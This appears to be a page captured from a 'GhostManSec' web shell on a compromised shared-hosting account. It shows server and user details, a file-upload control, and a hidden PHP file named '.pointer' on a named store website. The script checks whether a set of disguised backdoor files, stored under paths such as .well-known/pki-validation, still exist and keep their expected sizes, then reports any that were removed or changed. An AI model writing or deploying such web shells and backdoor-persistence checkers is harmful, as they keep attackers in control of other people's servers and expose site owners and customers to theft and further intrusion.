GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/store.whiteteakllc.com/.pointer
<?php   $r = '/home/niyknzcu/store.whiteteakllc.com'; $x = ["/puc.php"=>"bd@@1070092@@2",
"/zk.php"=>"bd@@1068991@@22",
"/.well-known/admin_members.php"=>"bd@@923056@@12",
"/export.class.php"=>"bd@@920573@@941",
"/.well-known/pki-validation/foitisi_buttons.php"=>"bd@@920581@@1709",
"/.well-known/admin_members.php"=>"bd@@920587@@946",
"/export.class.php"=>"bd@@923069@@26",
"/.well-known/pki-validation/foitisi_buttons.php"=>"bd@@923874@@89"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');